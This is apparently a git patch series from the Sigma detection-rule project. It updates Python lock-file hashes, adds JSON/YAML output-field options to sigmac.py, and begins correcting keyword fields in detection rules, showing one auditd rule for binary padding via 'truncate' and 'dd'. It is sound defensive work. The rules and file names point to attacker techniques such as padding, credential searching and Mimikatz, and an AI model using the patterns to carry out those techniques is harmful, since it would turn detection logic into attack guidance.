"sha256:7b2927e92feb51d830f531de4ccb11b320255ee95e791022555971c466af4527", + "sha256:7f7ecb53ae6848f959db6ae93bdff1740e651809780822270eab111500842a84", + "sha256:825d5fccef6da42f3c8eccd4281af399f21c02b32d98e113dbc631ea6a6ecbc7", + "sha256:846fc8336443106fe23f9b6d6b8c14a53d38cef9a375149d61f99d78782ea468", + "sha256:89221ec6d6026f8ae859c09b9718799fea22c0e8da8b766b0b2c9a9ba2db326b", + "sha256:9efef4aab5353387b07f6b22ace0867032b900d8e91674b5d8ea9150db5cae94", + "sha256:a32f8d81ea0c6173ab1b3da956869114cae53ba1e9f72374032e33ba3118c233", + "sha256:a49e0161897901d1ac9c4a79984b8410f450565bbad64dbfcbf76152743a0cdb", + "sha256:ada3f400d9923a190ea8b59c8f60680c4ef8a4b0dfae134d2f2ff68429adfab5", + "sha256:bf75d28fa071645c529b5474a550a44686821decebdd00e21127ef1fd566eabe", + "sha256:cfdb9389d888c5b74af297e51ce357b800dd844898af9d4a547ffc143fa56751", + "sha256:d67f273097c368265a7b81e152e07fb90ed395df6e552b9fa858c6d2c9f42502", + "sha256:dc6a613d6c74eef5a14a214d433d06291526145431c3b964f5e16529b1842bed", + "sha256:de9c6b8a1ba52919ae919f3ae96abb72b994dd0350226e28f3686cb4f142165c" + ], + "markers": "python_version < '3.10' and platform_python_implementation == 'CPython'", + "version": "==0.2.6" }, "six": { "hashes": [ "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926", "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==1.16.0" }, "urllib3": { "hashes": [ - "sha256:753a0374df26658f99d826cfe40394a686d05985786d946fbe4165b5148f5a7c", - "sha256:a7acd0977125325f516bda9735fa7142b909a8d01e8b2e4c8108d0984e6e0098" + "sha256:39fb8672126159acb139a7718dd10806104dec1e2f0f6c88aab05d17df10c8d4", + "sha256:f57b4c16c62fa2760b7e3d97c35b255512fb6b59a259730f36ba32ce9f8e342f" ], "index": "pypi", - "version": "==1.26.5" + "version": "==1.26.6" }, "wrapt": { "hashes": [ @@ -200,6 +262,7 @@ "sha256:f881853d2643a29e643609da57b96d5f9c9b93f62429dcc1cbb413c7d07f0e1a", "sha256:fe60131d21b31fd1a14bd43e6bb88256f69dfc3188b3a89d736d6c71ed43ec95" ], + "markers": "python_version >= '3.6'", "version": "==3.7.4.post0" }, "antlr4-python3-runtime": { @@ -214,21 +277,23 @@ "sha256:0c3c816a028d47f659d6ff5c745cb2acf1f966da1fe5c19c77a70282b25f4c5f", "sha256:4291ca197d287d274d0b6cb5d6f8f8f82d434ed288f962539ff18cc9012f9ea3" ], + "markers": "python_full_version >= '3.5.3'", "version": "==3.0.1" }, "attackcti": { "hashes": [ - "sha256:60059c597f39074db979482931c8771c31581c76e0ae6451c04214a1330a5d2f", - "sha256:a0c44c7065d2568b728e62a8325b0c5fde9d6901e4e0199bde7a9bab974bdcb9" + "sha256:2516b00631d4f0f8e05e950281ed94566774587b968901c02296e174835f0786", + "sha256:98d9c80a2c566847aa6d95fe824f48e8c45a418bbbb212e96dcf468693754cea" ], "index": "pypi", - "version": "==0.3.4.3" + "version": "==0.3.4.4" }, "attrs": { "hashes": [ "sha256:149e90d6d8ac20db7a955ad60cf0e6881a3f20d37096140088356da6c716b0b1", "sha256:ef6aaac3ca6cd92904cdd0d83f629a15f18053ec84e6432106f7a4d04ae4f5fb" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", "version": "==21.2.0" }, "certifi": { @@ -243,8 +308,17 @@ "sha256:0d6f53a15db4120f2b08c94f11e7d93d2c911ee118b6b30a04ec3ee8310179fa", "sha256:f864054d66fd9118f2e67044ac8981a54775ec5b67aed0441892edb553d21da5" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3, 3.4'", "version": "==4.0.0" }, + "charset-normalizer": { + "hashes": [ + "sha256:0c8911edd15d19223366a194a513099a302055a962bca2cec0f54b8b63175d8b", + "sha256:f23667ebe1084be45f6ae0538e4a5a865206544097e4e8bbcacf42cd02a348f3" + ], + "markers": "python_version >= '3'", + "version": "==2.0.4" + }, "colorama": { "hashes": [ "sha256:5941b2b48a20143d2267e95b1c2a7603ce057ee39fd88e7329b0c292aa16869b", @@ -313,11 +387,11 @@ }, "elasticsearch": { "hashes": [ - "sha256:9a77172be02bc4855210d83f0f1346a1e7d421e3cb2ca47ba81ac0c5a717b3a0", - "sha256:c67b0f6541eda6de9f92eaea319c070aa2710c5d4d4ee5e3dfa3c21bd95aa378" + "sha256:084979d21cc2955903ecc215bb40b8180207b2bcb5e52ec0ec7dd6f60affd01e", + "sha256:f3ab1454e646170bbc6796b8707e4bff125234391d2acc022221e1c0313becb4" ], "index": "pypi", - "version": "==7.12.0" + "version": "==7.14.0" }, "elasticsearch-async": { "hashes": [ @@ -329,16 +403,18 @@ }, "idna": { "hashes": [ - "sha256:b307872f855b18632ce0c21c5e45be78c0ea7ae4c15c828c20788b26921eb3f6", - "sha256:b97d804b1e9b523befed77c48dacec60e6dcb0b5391d57af6a65a312a90648c0" + "sha256:14475042e284991034cb48e06f6851428fb14c4dc953acd9be9a5e95c7b6dd7a", + "sha256:467fbad99067910785144ce333826c71fb0e63a425657295239737f7ecd125f3" ], - "version": "==2.10" + "markers": "python_version >= '3'", + "version": "==3.2" }, "more-itertools": { "hashes": [ "sha256:2cf89ec599962f2ddc4d568a05defc40e0a587fbc10d5989713638864c36be4d", "sha256:83f0308e05477c68f56ea3a888172c78ed5d5b3c282addb67508e7ba6c8f813a" ], + "markers": "python_version >= '3.5'", "version": "==8.8.0" }, "multidict": { @@ -381,27 +457,30 @@ "sha256:f21756997ad8ef815d8ef3d34edd98804ab5ea337feedcd62fb52d22bf531281", "sha256:fc13a9524bc18b6fb6e0dbec3533ba0496bbed167c56d0aabefd965584557d80" ], + "markers": "python_version >= '3.6'", "version": "==5.1.0" }, "packaging": { "hashes": [ - "sha256:5b327ac1320dc863dca72f4514ecc086f31186744b84a230374cc1fd776feae5", - "sha256:67714da7f7bc052e064859c05c595155bd1ee9f69f76557e21f051443c20947a" + "sha256:7dc96269f53a4ccec5c0670940a4281106dd0bb343f47b7471f779df49c2fbe7", + "sha256:c86254f9220d55e31cc94d69bade760f0847da8000def4dfe1c6b872fd14ff14" ], - "version": "==20.9" + "markers": "python_version >= '3.6'", + "version": "==21.0" }, "pathspec": { "hashes": [ - "sha256:86379d6b86d75816baba717e64b1a3a3469deb93bb76d613c9ce79edc5cb68fd", - "sha256:aa0cb481c4041bf52ffa7b0d8fa6cd3e88a2ca4879c533c9153882ee2556790d" + "sha256:7d15c4ddb0b5c802d161efc417ec1a2558ea2653c2e8ad9c19098201dc1c993a", + "sha256:e564499435a2673d586f6b2130bb5b95f04a3ba06f81b8f895b651a3c76aabb1" ], - "version": "==0.8.1" + "version": "==0.9.0" }, "pluggy": { "hashes": [ "sha256:15b2acde666561e1298d71b523007ed7364de07029219b604cf808bfa1c765b0", "sha256:966c145cd83c96502c3c3868f50408687b38434af77734af1e9ca461a4081d2d" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==0.13.1" }, "py": { @@ -409,6 +488,7 @@ "sha256:21b81bda15b66ef5e1a777a21c4dcd9c20ad3efd0b3f817e7a809035269e1bd3", "sha256:3b80836aa6d1feeaa108e046da6423ab8f6ceda6468545ae8d02d9d58d18818a" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==1.10.0" }, "pyparsing": { @@ -416,6 +496,7 @@ "sha256:c203ec8783bf771a155b207279b9bccb8dea02d8f0c9e5f8ead507bc3246ecc1", "sha256:ef9d7589ef3c200abe66653d3f1ab1033c3c419ae9b9bdb1240a85b024efc88b" ], + "markers": "python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==2.4.7" }, "pytest": { @@ -470,76 +551,70 @@ }, "requests": { "hashes": [ - "sha256:27973dd4a904a4f13b263a19c866c13b92a39ed1c964655f025f3f8d3d75b804", - "sha256:c210084e36a42ae6b9219e00e48287def368a26d03a048ddad7bfee44f75871e" + "sha256:6c1246513ecd5ecd4528a0906f910e8f0f9c6b8ec72030dc9fd154dc1a6efd24", + "sha256:b8aa58f8cf793ffd8782d3d8cb19e66ef36f7aba4353eec859e74678b01b07a7" ], "index": "pypi", - "version": "==2.25.1" + "version": "==2.26.0" }, "simplejson": { "hashes": [ - "sha256:034550078a11664d77bc1a8364c90bb7eef0e44c2dbb1fd0a4d92e3997088667", - "sha256:05b43d568300c1cd43f95ff4bfcff984bc658aa001be91efb3bb21df9d6288d3", - "sha256:0dd9d9c738cb008bfc0862c9b8fa6743495c03a0ed543884bf92fb7d30f8d043", - "sha256:10fc250c3edea4abc15d930d77274ddb8df4803453dde7ad50c2f5565a18a4bb", - "sha256:2862beabfb9097a745a961426fe7daf66e1714151da8bb9a0c430dde3d59c7c0", - "sha256:292c2e3f53be314cc59853bd20a35bf1f965f3bc121e007ab6fd526ed412a85d", - "sha256:2d3eab2c3fe52007d703a26f71cf649a8c771fcdd949a3ae73041ba6797cfcf8", - "sha256:2e7b57c2c146f8e4dadf84977a83f7ee50da17c8861fd7faf694d55e3274784f", - "sha256:311f5dc2af07361725033b13cc3d0351de3da8bede3397d45650784c3f21fbcf", - "sha256:344e2d920a7f27b4023c087ab539877a1e39ce8e3e90b867e0bfa97829824748", - "sha256:3fabde09af43e0cbdee407555383063f8b45bfb52c361bc5da83fcffdb4fd278", - "sha256:42b8b8dd0799f78e067e2aaae97e60d58a8f63582939af60abce4c48631a0aa4", - "sha256:4b3442249d5e3893b90cb9f72c7d6ce4d2ea144d2c0d9f75b9ae1e5460f3121a", - "sha256:55d65f9cc1b733d85ef95ab11f559cce55c7649a2160da2ac7a078534da676c8", - "sha256:5c659a0efc80aaaba57fcd878855c8534ecb655a28ac8508885c50648e6e659d", - "sha256:72d8a3ffca19a901002d6b068cf746be85747571c6a7ba12cbcf427bfb4ed971", - "sha256:75ecc79f26d99222a084fbdd1ce5aad3ac3a8bd535cd9059528452da38b68841", - "sha256:76ac9605bf2f6d9b56abf6f9da9047a8782574ad3531c82eae774947ae99cc3f", - "sha256:7d276f69bfc8c7ba6c717ba8deaf28f9d3c8450ff0aa8713f5a3280e232be16b", - "sha256:7f10f8ba9c1b1430addc7dd385fc322e221559d3ae49b812aebf57470ce8de45", - "sha256:8042040af86a494a23c189b5aa0ea9433769cc029707833f261a79c98e3375f9", - "sha256:813846738277729d7db71b82176204abc7fdae2f566e2d9fcf874f9b6472e3e6", - "sha256:845a14f6deb124a3bcb98a62def067a67462a000e0508f256f9c18eff5847efc", - "sha256:869a183c8e44bc03be1b2bbcc9ec4338e37fa8557fc506bf6115887c1d3bb956", - "sha256:8acf76443cfb5c949b6e781c154278c059b09ac717d2757a830c869ba000cf8d", - "sha256:8f713ea65958ef40049b6c45c40c206ab363db9591ff5a49d89b448933fa5746", - "sha256:934115642c8ba9659b402c8bdbdedb48651fb94b576e3b3efd1ccb079609b04a", - "sha256:9551f23e09300a9a528f7af20e35c9f79686d46d646152a0c8fc41d2d074d9b0", - "sha256:9a2b7543559f8a1c9ed72724b549d8cc3515da7daf3e79813a15bdc4a769de25", - "sha256:a55c76254d7cf8d4494bc508e7abb993a82a192d0db4552421e5139235604625", - "sha256:ad8f41c2357b73bc9e8606d2fa226233bf4d55d85a8982ecdfd55823a6959995", - "sha256:af4868da7dd53296cd7630687161d53a7ebe2e63814234631445697bd7c29f46", - "sha256:afebfc3dd3520d37056f641969ce320b071bc7a0800639c71877b90d053e087f", - "sha256:b59aa298137ca74a744c1e6e22cfc0bf9dca3a2f41f51bc92eb05695155d905a", - "sha256:bc00d1210567a4cdd215ac6e17dc00cb9893ee521cee701adfd0fa43f7c73139", - "sha256:c1cb29b1fced01f97e6d5631c3edc2dadb424d1f4421dad079cb13fc97acb42f", - "sha256:c94dc64b1a389a416fc4218cd4799aa3756f25940cae33530a4f7f2f54f166da", - "sha256:ceaa28a5bce8a46a130cd223e895080e258a88d51bf6e8de2fc54a6ef7e38c34", - "sha256:cff6453e25204d3369c47b97dd34783ca820611bd334779d22192da23784194b", - "sha256:d0b64409df09edb4c365d95004775c988259efe9be39697d7315c42b7a5e7e94", - "sha256:d4813b30cb62d3b63ccc60dd12f2121780c7a3068db692daeb90f989877aaf04", - "sha256:da3c55cdc66cfc3fffb607db49a42448785ea2732f055ac1549b69dcb392663b", - "sha256:e058c7656c44fb494a11443191e381355388443d543f6fc1a245d5d238544396", - "sha256:fed0f22bf1313ff79c7fc318f7199d6c2f96d4de3234b2f12a1eab350e597c06", - "sha256:ffd4e4877a78c84d693e491b223385e0271278f5f4e1476a4962dca6824ecfeb" + "sha256:02bc0b7b643fa255048862f580bb4b7121b88b456bc64dabf9bf11df116b05d7", + "sha256:02c04b89b0a456a97d5313357dd9f2259c163a82c5307e39e7d35bb38d7fd085", + "sha256:05cd392c1c9b284bda91cf9d7b6f3f46631da459e8546fe823622e42cf4794bb", + "sha256:1331a54fda3c957b9136402943cf8ebcd29c0c92101ba70fa8c2fc9cdf1b8476", + "sha256:18302970ce341c3626433d4ffbdac19c7cca3d6e2d54b12778bcb8095f695473", + "sha256:1ebbaa48447b60a68043f58e612021e8893ebcf1662a1b18a2595ca262776d7e", + "sha256:2104475a0263ff2a3dffca214c9676eb261e90d06d604ac7063347bd289ac84c", + "sha256:23169d78f74fd25f891e89c779a63fcb857e66ab210096f4069a5b1c9e2dc732", + "sha256:32edf4e491fe174c54bf6682d794daf398736158d1082dbcae526e4a5af6890b", + "sha256:3904b528e3dc0facab73a4406ebf17f007f32f0a8d7f4c6aa9ed5cbad3ea0f34", + "sha256:391a8206e698557a4155354cf6996c002aa447a21c5c50fb94a0d26fd6cca586", + "sha256:3c80b343503da8b13fa7d48d1a2395be67e97b67a849eb79d88ad3b12783e7da", + "sha256:3dddd31857d8230aee88c24f485ebca36d1d875404b2ef11ac15fa3c8a01dc34", + "sha256:56f57c231cdd01b6a1c0532ea9088dff2afe7f4f4bda61c060bcb1a853e6b564", + "sha256:5b080be7de4c647fa84252cf565298a13842658123bd1a322a8c32b6359c8f1e", + "sha256:6285b91cfa37e024f372b9b77d14f279380eebc4f709db70c593c069602e1926", + "sha256:6510e886d9e9006213de2090c55f504b12f915178a2056b94840ed1d89abe68e", + "sha256:6ff6710b824947ef5a360a5a5ae9809c32cedc6110df3b64f01080c1bc1a1f08", + "sha256:79545a6d93bb38f86a00fbc6129cb091a86bb858e7d53b1aaa10d927d3b6732e", + "sha256:88a69c7e8059a4fd7aa2a31d2b3d89077eaae72eb741f18a32cb57d04018ff4c", + "sha256:8f174567c53413383b8b7ec2fbe88d41e924577bc854051f265d4c210cd72999", + "sha256:a52b80b9d1085db6e216980d1d28a8f090b8f2203a8c71b4ea13441bd7a2e86e", + "sha256:b25748e71c5df3c67b5bda2cdece373762d319cb5f773f14ae2f90dfb4320314", + "sha256:b45b5f6c9962953250534217b18002261c5b9383349b95fb0140899cdac2bf95", + "sha256:b4ed7b233e812ef1244a29fb0dfd3e149dbc34a2bd13b174a84c92d0cb580277", + "sha256:b60f48f780130f27f8d9751599925c3b78cf045f5d62dd918003effb65b45bda", + "sha256:c69a213ae72b75e8948f06a87d3675855bccb3037671222ffd235095e62f5a61", + "sha256:c91d0f2fc2ee1bd376f5a991c24923f12416d8c31a9b74a82c4b38b942fc2640", + "sha256:d61fb151be068127a0ce7758341cbe778495819622bc1e15eadf59fdb3a0481e", + "sha256:da72a452bcf4349fc467a12b54ab0e63e654a571cacc44084826d52bde12b6ee", + "sha256:dbcd6cd1a9abb5a13c5df93cdc5687f6877efcfefdc9350c22d4094dc4a7dd86", + "sha256:e056056718246c9cdd82d1e3d4ad854a7ceb057498bf994b529750a190a6bd98", + "sha256:e3aa10cce4053f3c1487aaf847a0faa4ae208e11f85a8e6f98de2291713a6616", + "sha256:e7433c604077a17dd71e8b29c96a15e486a70a97f4ed9c7f5e0df6e428af2f0b", + "sha256:f02db159e0afa9cb350f15f4f7b86755eae95267b9012ee90bde329aa643f76c", + "sha256:f32a703fe10cfc2d1020e296eeeeb650faa039678f6b79d9b820413a4c015ddc", + "sha256:fed5e862d9b501c5673c163c8593ebdb2c5422386089c529dfac28d70cd55858", + "sha256:ff7fe042169dd6fce8213c173a4c337f2e807ed5178093143c778eb0484c12ec" ], - "version": "==3.17.2" + "markers": "python_version >= '2.5' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==3.17.3" }, "six": { "hashes": [ "sha256:1e61c37477a1626458e36f7b1d82aa5c9b094fa4802892072e49de9c60c4c926", "sha256:8abb2f1d86890a2dfb989f9a77cfcfd3e47c2a354b01111771326f8aa26e0254" ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", "version": "==1.16.0" }, "stix2": { "hashes": [ - "sha256:15c9cf599f5c43124e76fe71b883e4918f6f4cf65b084c58ec64b6180f45c938", - "sha256:3ab60082e4bffb39f75ea9ddc338b64126ff1cd086e6173d39b860191ac26ff4" + "sha256:b9b2200e5c429a0a49d67c8902638d2f97df2ba4321e15dde067c5cb80c9e8e1" ], "index": "pypi", - "version": "==2.1.0" + "version": "==3.0.0" }, "stix2-patterns": { "hashes": [ @@ -565,11 +640,11 @@ }, "urllib3": { "hashes": [ - "sha256:753a0374df26658f99d826cfe40394a686d05985786d946fbe4165b5148f5a7c", - "sha256:a7acd0977125325f516bda9735fa7142b909a8d01e8b2e4c8108d0984e6e0098" + "sha256:39fb8672126159acb139a7718dd10806104dec1e2f0f6c88aab05d17df10c8d4", + "sha256:f57b4c16c62fa2760b7e3d97c35b255512fb6b59a259730f36ba32ce9f8e342f" ], "index": "pypi", - "version": "==1.26.5" + "version": "==1.26.6" }, "wcwidth": { "hashes": [ @@ -580,11 +655,10 @@ }, "yamllint": { "hashes": [ - "sha256:8a5f8e442f49309eaf3e9d7232ce76f2fc8026f5c0c0b164b83f33fed1399637", - "sha256:b0e4c89985c7f5f8451c2eb8c67d804d10ac13a4abe031cbf49bdf3465d01087" + "sha256:0b08a96750248fdf21f1e8193cb7787554ef75ed57b27f621cd6b3bf09af11a1" ], "index": "pypi", - "version": "==1.26.0" + "version": "==1.26.2" }, "yarl": { "hashes": [ @@ -626,6 +700,7 @@ "sha256:f0b059678fd549c66b89bed03efcabb009075bd131c248ecdf087bdb6faba24a", "sha256:fcbb48a93e8699eae920f8d92f7160c03567b421bc17362a9ffbbd706a816f71" ], + "markers": "python_version >= '3.6'", "version": "==1.6.3" } } diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 0da400c2..2e8863c1 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -18,6 +18,7 @@ import sys import argparse import yaml +import ruamel.yaml import json import pathlib import itertools @@ -53,10 +54,14 @@ ERR_RULE_FILTER_PARSING = 11 ERR_CONFIG_REQUIRED = 20 ERR_CONFIG_ORDER = 21 ERR_CONFIG_BACKEND = 22 +ERR_OUTPUT_FORMAT = 30 ERR_NOT_IMPLEMENTED = 42 ERR_PARTIAL_FIELD_MATCH = 80 ERR_FULL_FIELD_MATCH = 90 +# Allowed fields in output +allowed_fields = ["title", "id", "status", "description", "author", "references", "fields", "falsepositives", "level", "tags", "filename"] + def alliter(path): for sub in path.iterdir(): if sub.name.startswith("."): @@ -104,6 +109,11 @@ def set_argparser(): argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations") argparser.add_argument("--config", "-c", action="append", help="Configurations with field name and index mapping for target environment. Multiple configurations are merged into one. Last config is authoritative in case of conflicts.") argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\')") + argparser.add_argument("--output-fields", "-of", help="""Enhance your output with additional fields from the Sigma rule (not only the converted rule itself). + Select the fields you want by providing their list delimited with commas (no space). Only work with the '--output-format' option and with 'json' or 'yaml' value. + available additional fields : title, id, status, description, author, references, fields, falsepositives, level, tags. + This option do not have any effect for backends that already format output : elastalert, kibana, splukxml etc. """) + argparser.add_argument("--output-format", "-oF", default="raw", choices=["raw", "json", "yaml"], help="Use only if you want to have JSON or YAML output (default is raw text)") argparser.add_argument("--output-extention", "-e", default=None, help="Extention of Output file for filename prefix use") argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character") argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend") @@ -213,6 +223,18 @@ def main(): print("Sigma configuration parse error in %s: %s" % (conf_name, str(e)), file=sys.stderr) exit(ERR_CONFIG_PARSING) + if cmdargs.output_fields: + if cmdargs.output_format != "raw": + output_fields_rejected = [field for field in cmdargs.output_fields.split(",") if field not in allowed_fields] # Not allowed fields + if output_fields_rejected: + print("These fields are not allowed (check help for allow field list) : %s" % (", ".join(output_fields_rejected)), file=sys.stderr) + exit(ERR_OUTPUT_FORMAT) + else: + output_fields_filtered = [field for field in cmdargs.output_fields.split(",") if field in allowed_fields] # Keep only allowed fields + else: + print("The '--output-fields' or '-of' arguments must be use with '--output-format' or '-oF' equal to 'json' or 'yaml'", file=sys.stderr) + exit(ERR_OUTPUT_FORMAT) + backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config) backend = backend_class(sigmaconfigs, backend_options) @@ -240,6 +262,7 @@ def main(): out = sys.stdout error = 0 + output_array = [] for sigmafile in get_inputs(cmdargs.inputs, cmdargs.recurse): logger.debug("* Processing Sigma input %s" % (sigmafile)) try: @@ -249,12 +272,13 @@ def main(): f = sigmafile.open(encoding='utf-8') parser = SigmaCollectionParser(f, sigmaconfigs, rulefilter, sigmafile) results = parser.generate(backend) - + nb_result = len(list(copy.deepcopy(results))) inc_filenane = None if nb_result < 2 else 0 - newline_separator = '\0' if cmdargs.print0 else '\n' + + results = list(results) # Since results is an iterator and used twice we convert it a list for result in results: if not fileprefix == None and not inc_filenane == None: #yml action try: @@ -273,8 +297,22 @@ def main(): except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) exit(ERR_OUTPUT) - print(result, file=out, end=newline_separator) - + if not cmdargs.output_fields: + print(result, file=out, end=newline_separator) + + if cmdargs.output_fields: # Handle output fields + output={} + f.seek(0) + docs = yaml.load_all(f, Loader=yaml.FullLoader) + for doc in docs: + for k,v in doc.items(): + if k in output_fields_filtered: + output[k] = v + output['rule'] = [result for result in results] + if "filename" in output_fields_filtered: + output['filename'] = str(sigmafile.name) + output_array.append(output) + if nb_result == 0: # elastalert return "results=[]" so get a error with out not def if not fileprefix == None and not inc_filenane == None: #yml action try: @@ -293,7 +331,7 @@ def main(): except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) exit(ERR_OUTPUT) - + except OSError as e: print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr) error = ERR_OPEN_SIGMA_RULE @@ -321,7 +359,6 @@ def main(): sys.exit(error) except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) - print("Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma", file=sys.stderr) if not cmdargs.ignore_backend_errors: error = ERR_NOT_IMPLEMENTED if not cmdargs.defer_abort: @@ -343,10 +380,20 @@ def main(): f.close() except: pass - + result = backend.finalize() if result: print(result, file=out) + + if cmdargs.output_fields: + if cmdargs.output_format == 'json': + print(json.dumps(output_array, indent=4, ensure_ascii=False), file=out) + elif cmdargs.output_format == 'yaml': + yml = ruamel.yaml.YAML() + yml.explicit_start = True + yml.indent(mapping=2, sequence=4, offset=2) + print(ruamel.yaml.round_trip_dump(output_array), file=out) + out.close() sys.exit(error) From cbb03db2ddf098df08bfe30d37e2e0c090d42bb6 Mon Sep 17 00:00:00 2001 From: wagga40 <6437862+wagga40@users.noreply.github.com> Date: Thu, 12 Aug 2021 15:28:45 +0200 Subject: [PATCH 0314/1367] Fix the way YAML is dumped --- tools/sigma/sigmac.py | 3 --- 1 file changed, 3 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 2e8863c1..77c88641 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -389,9 +389,6 @@ def main(): if cmdargs.output_format == 'json': print(json.dumps(output_array, indent=4, ensure_ascii=False), file=out) elif cmdargs.output_format == 'yaml': - yml = ruamel.yaml.YAML() - yml.explicit_start = True - yml.indent(mapping=2, sequence=4, offset=2) print(ruamel.yaml.round_trip_dump(output_array), file=out) out.close() From 13a3e78184d7e626ceb2d837b0a019d850e3b9ee Mon Sep 17 00:00:00 2001 From: wagga40 <6437862+wagga40@users.noreply.github.com> Date: Thu, 12 Aug 2021 15:54:02 +0200 Subject: [PATCH 0315/1367] Fix options : removed "raw" --- tools/sigma/sigmac.py | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 77c88641..556b26d4 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -113,7 +113,7 @@ def set_argparser(): Select the fields you want by providing their list delimited with commas (no space). Only work with the '--output-format' option and with 'json' or 'yaml' value. available additional fields : title, id, status, description, author, references, fields, falsepositives, level, tags. This option do not have any effect for backends that already format output : elastalert, kibana, splukxml etc. """) - argparser.add_argument("--output-format", "-oF", default="raw", choices=["raw", "json", "yaml"], help="Use only if you want to have JSON or YAML output (default is raw text)") + argparser.add_argument("--output-format", "-oF", choices=["json", "yaml"], help="Use only if you want to have JSON or YAML output (default is raw text)") argparser.add_argument("--output-extention", "-e", default=None, help="Extention of Output file for filename prefix use") argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character") argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend") @@ -224,7 +224,7 @@ def main(): exit(ERR_CONFIG_PARSING) if cmdargs.output_fields: - if cmdargs.output_format != "raw": + if cmdargs.output_format: output_fields_rejected = [field for field in cmdargs.output_fields.split(",") if field not in allowed_fields] # Not allowed fields if output_fields_rejected: print("These fields are not allowed (check help for allow field list) : %s" % (", ".join(output_fields_rejected)), file=sys.stderr) @@ -232,7 +232,7 @@ def main(): else: output_fields_filtered = [field for field in cmdargs.output_fields.split(",") if field in allowed_fields] # Keep only allowed fields else: - print("The '--output-fields' or '-of' arguments must be use with '--output-format' or '-oF' equal to 'json' or 'yaml'", file=sys.stderr) + print("The '--output-fields' or '-of' arguments must be used with '--output-format' or '-oF' equal to 'json' or 'yaml'", file=sys.stderr) exit(ERR_OUTPUT_FORMAT) backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config) From 6f05e33feb35b1c354ee192989fe437c53a1d290 Mon Sep 17 00:00:00 2001 From: Max Altgelt Date: Thu, 12 Aug 2021 14:03:18 +0200 Subject: [PATCH 0316/1367] fix: Correct incorrect message / keyword usage Correct a number of rules where message or keyword were incorrectly used as field names in events (typically windows event logs). However, neither field actually exists and as such these strings could never match. --- .../auditd/lnx_auditd_binary_padding.yml | 20 +++--- .../lnx_auditd_change_file_time_attr.yml | 9 ++- .../auditd/lnx_auditd_find_cred_in_files.yml | 11 ++- .../lnx_auditd_susp_histfile_operations.yml | 18 ++--- .../lnx_auditd_system_shutdown_reboot.yml | 30 ++++---- rules/linux/lnx_file_copy.yml | 5 +- ...in_alert_active_directory_user_control.yml | 2 +- .../builtin/win_alert_mimikatz_keywords.yml | 21 +++--- .../windows/builtin/win_av_relevant_match.yml | 46 ++++++------ .../win_hybridconnectionmgr_svc_running.yml | 12 ++-- ...in_set_oabvirtualdirectory_externalurl.yml | 11 ++- .../builtin/win_susp_msmpeng_crash.yml | 5 +- rules/windows/builtin/win_susp_sam_dump.yml | 8 +-- .../windows/builtin/win_vul_cve_2020_0688.yml | 3 +- rules/windows/other/win_defender_disabled.yml | 6 +- .../win_exchange_TransportAgent_failed.yml | 5 +- ...gon_exploitation_using_wellknown_tools.yml | 16 ++--- rules/windows/other/win_wmi_persistence.yml | 10 +-- .../powershell_alternate_powershell_hosts.yml | 5 +- .../powershell_malicious_keywords.yml | 41 ++++++----- .../powershell_suspicious_download.yml | 15 ++-- ...ershell_suspicious_invocation_specific.yml | 72 +++++++++---------- .../powershell_suspicious_keywords.yml | 23 +++--- ...shell_wsman_com_provider_no_powershell.yml | 4 +- .../win_exchange_proxylogon_oabvirtualdir.yml | 16 ++--- .../win_exchange_transportagent.yml | 2 +- .../win_susp_recon_activity.yml | 7 +- .../win_syncappvpublishingserver_exe.yml | 2 +- .../sysmon/sysmon_config_modification.yml | 3 +- 29 files changed, 199 insertions(+), 229 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_binary_padding.yml b/rules/linux/auditd/lnx_auditd_binary_padding.yml index cba35757..a6df756d 100644 --- a/rules/linux/auditd/lnx_auditd_binary_padding.yml +++ b/rules/linux/auditd/lnx_auditd_binary_padding.yml @@ -14,19 +14,17 @@ logsource: product: linux service: auditd detection: - selection1: + execve: type: 'EXECVE' - keywords|contains|all: - - 'truncate' - - '-s' - selection2: - type: 'EXECVE' - keywords|contains|all: - - 'dd' - - 'if=' + truncate: + - 'truncate' + - '-s' + dd: + - 'dd' + - 'if=' filter: - keywords|contains: 'of=' - condition: selection1 or (selection2 and not filter) + - 'of=' + condition: execve and (all of truncate or (all of dd and not filter)) falsepositives: - 'Legitimate script work' level: high diff --git a/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml 